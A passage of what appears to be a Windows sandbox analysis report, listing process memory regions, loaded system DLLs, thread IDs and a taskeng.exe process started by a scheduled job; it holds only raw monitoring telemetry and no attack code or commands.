0x660000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 3004 start_va = 0x7f0000 end_va = 0x8effff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 3005 start_va = 0x950000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 3006 start_va = 0x9e0000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 3007 start_va = 0xa60000 end_va = 0xd2efff entry_point = 0xa60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3008 start_va = 0xd30000 end_va = 0x1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 3009 start_va = 0x1190000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3010 start_va = 0x1270000 end_va = 0x12effff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 3011 start_va = 0x1410000 end_va = 0x148ffff entry_point = 0x0 region_type = private name = "private_0x0000000001410000" filename = "" Region: id = 3012 start_va = 0x1540000 end_va = 0x15bffff entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 3013 start_va = 0x15d0000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 3014 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3015 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3016 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3017 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3018 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3019 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3020 start_va = 0xff7f0000 end_va = 0xff84efff entry_point = 0xff7f0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 3021 start_va = 0x7fef5630000 end_va = 0x7fef5645fff entry_point = 0x7fef5630000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 3022 start_va = 0x7fef5e10000 end_va = 0x7fef5e95fff entry_point = 0x7fef5e10000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3023 start_va = 0x7fefb4a0000 end_va = 0x7fefb4ccfff entry_point = 0x7fefb4a0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3024 start_va = 0x7fefb610000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb610000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 3025 start_va = 0x7fefb780000 end_va = 0x7fefb793fff entry_point = 0x7fefb780000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 3026 start_va = 0x7fefb810000 end_va = 0x7fefb836fff entry_point = 0x7fefb810000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 3027 start_va = 0x7fefb8a0000 end_va = 0x7fefb8aefff entry_point = 0x7fefb8a0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3028 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3029 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3030 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3031 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3032 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3033 start_va = 0x7fefd900000 end_va = 0x7fefd94cfff entry_point = 0x7fefd900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3034 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3035 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3036 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3037 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3038 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3039 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3040 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3041 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3042 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3043 start_va = 0x7feff380000 end_va = 0x7feff456fff entry_point = 0x7feff380000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3044 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3045 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3046 start_va = 0x7feff5b0000 end_va = 0x7feff648fff entry_point = 0x7feff5b0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3047 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3048 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3049 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 3050 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 3051 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3052 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 3053 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 3054 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 3055 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 3056 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3057 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3058 start_va = 0x7fef5790000 end_va = 0x7fef57b5fff entry_point = 0x7fef5790000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 3059 start_va = 0x7fedd3d0000 end_va = 0x7fedd41bfff entry_point = 0x7fedd3d0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 3060 start_va = 0x7fee2ed0000 end_va = 0x7fee30c9fff entry_point = 0x7fee2ed0000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 3061 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3062 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3063 start_va = 0x7fefae10000 end_va = 0x7fefae17fff entry_point = 0x7fefae10000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 3064 start_va = 0x74e40000 end_va = 0x74e42fff entry_point = 0x74e40000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 3065 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 3066 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3067 start_va = 0x120000 end_va = 0x122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3068 start_va = 0x1b0000 end_va = 0x1b4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3069 start_va = 0x1350000 end_va = 0x13cffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 3070 start_va = 0x14c0000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 3071 start_va = 0x1650000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 3072 start_va = 0x7fefb720000 end_va = 0x7fefb734fff entry_point = 0x7fefb720000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3073 start_va = 0x7fefb740000 end_va = 0x7fefb74bfff entry_point = 0x7fefb740000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 3074 start_va = 0x7fefb750000 end_va = 0x7fefb765fff entry_point = 0x7fefb750000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 3075 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 3076 start_va = 0x7fefd320000 end_va = 0x7fefd342fff entry_point = 0x7fefd320000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 3077 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3078 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3079 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 3080 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 3081 start_va = 0x7fefb700000 end_va = 0x7fefb713fff entry_point = 0x7fefb700000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3082 start_va = 0x7fefcc10000 end_va = 0x7fefcc3ffff entry_point = 0x7fefcc10000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3083 start_va = 0x7fef3090000 end_va = 0x7fef30a1fff entry_point = 0x7fef3090000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 3084 start_va = 0x7fef79b0000 end_va = 0x7fef79b9fff entry_point = 0x7fef79b0000 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 3085 start_va = 0x7fefb0e0000 end_va = 0x7fefb0ebfff entry_point = 0x7fefb0e0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3086 start_va = 0x1750000 end_va = 0x1a92fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 3087 start_va = 0x7fef3060000 end_va = 0x7fef308bfff entry_point = 0x7fef3060000 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 3088 start_va = 0x7fef8e70000 end_va = 0x7fef8e7efff entry_point = 0x7fef8e70000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3089 start_va = 0x7fefd6c0000 end_va = 0x7fefd6d9fff entry_point = 0x7fefd6c0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3090 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f5fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Thread: id = 171 os_tid = 0x4dc Thread: id = 172 os_tid = 0x514 Thread: id = 173 os_tid = 0x4fc Thread: id = 174 os_tid = 0x8a4 Thread: id = 175 os_tid = 0x828 Thread: id = 176 os_tid = 0x8ac Thread: id = 177 os_tid = 0x6b4 Thread: id = 178 os_tid = 0x4b8 Thread: id = 179 os_tid = 0x418 Thread: id = 371 os_tid = 0x6f0 Process: id = "25" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x69880000" os_pid = "0x610" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "20" os_parent_pid = "0x714" cmd_line = "taskeng.exe {8D1E101D-BBDA-4972-B842-8278D1789882} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\\aETAdzjz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3208 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3209 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 3210 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3211 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3212 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3213 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 3214 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3215 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 3216 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 3217 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3218 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 3219 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 3220 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3221 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3222 start_va = 0x450000 end_va = 0x5d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 3223 start_va = 0x5e0000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 3224 start_va = 0x770000 end_va = 0x1b6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 3225 start_va = 0x1b70000 end_va = 0x1f62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b70000" filename = "" Region: id = 3226 start_va = 0x2000000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 3227 start_va = 0x2080000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 3228 start_va = 0x2100000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 3229 start_va = 0x22b0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 3230 start_va = 0x2350000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 3231 start_va = 0x2400000 end_va = 0x26cefff entry_point = 0x2400000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3232 start_va = 0x2790000 end_va = 0x286efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002790000" filename = "" Region: id = 3233 start_va = 0x2910000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 3234 start_va = 0x2a50000 end_va = 0x2acffff entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 3235 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3236 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3237 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3238 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3239 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3240 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3241 start_va = 0xff4d0000 end_va = 0xff543fff entry_point = 0xff4d0000 region_type = mapped_file name = "taskeng.exe" filename = "\\Windows\\System32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe") Region: id = 3242 start_va = 0x7fef60c0000 end_va = 0x7fef60c8fff entry_point = 0x7fef60c0000 region_type = mapped_file name = "tschannel.dll" filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll") Region: id = 3243 start_va = 0x7fefa810000 end_va = 0x7fefa819fff entry_point = 0x7fefa810000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 3244 start_va = 0x7fefb9e0000 end_va = 0x7fefba14fff entry_point = 0x7fefb9e0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 3245 start_va = 0x7fefba20000 end_va = 0x7fefba37fff entry_point = 0x7fefba20000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3246 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3247 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3248 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3249 start_va = 0x7fefd050000 end_va = 0x7fefd0bcfff entry_point = 0x7fefd050000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3250 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3251 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3252 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3253 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3254 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3255 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3256 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3257 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3258 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3259 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3260 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = 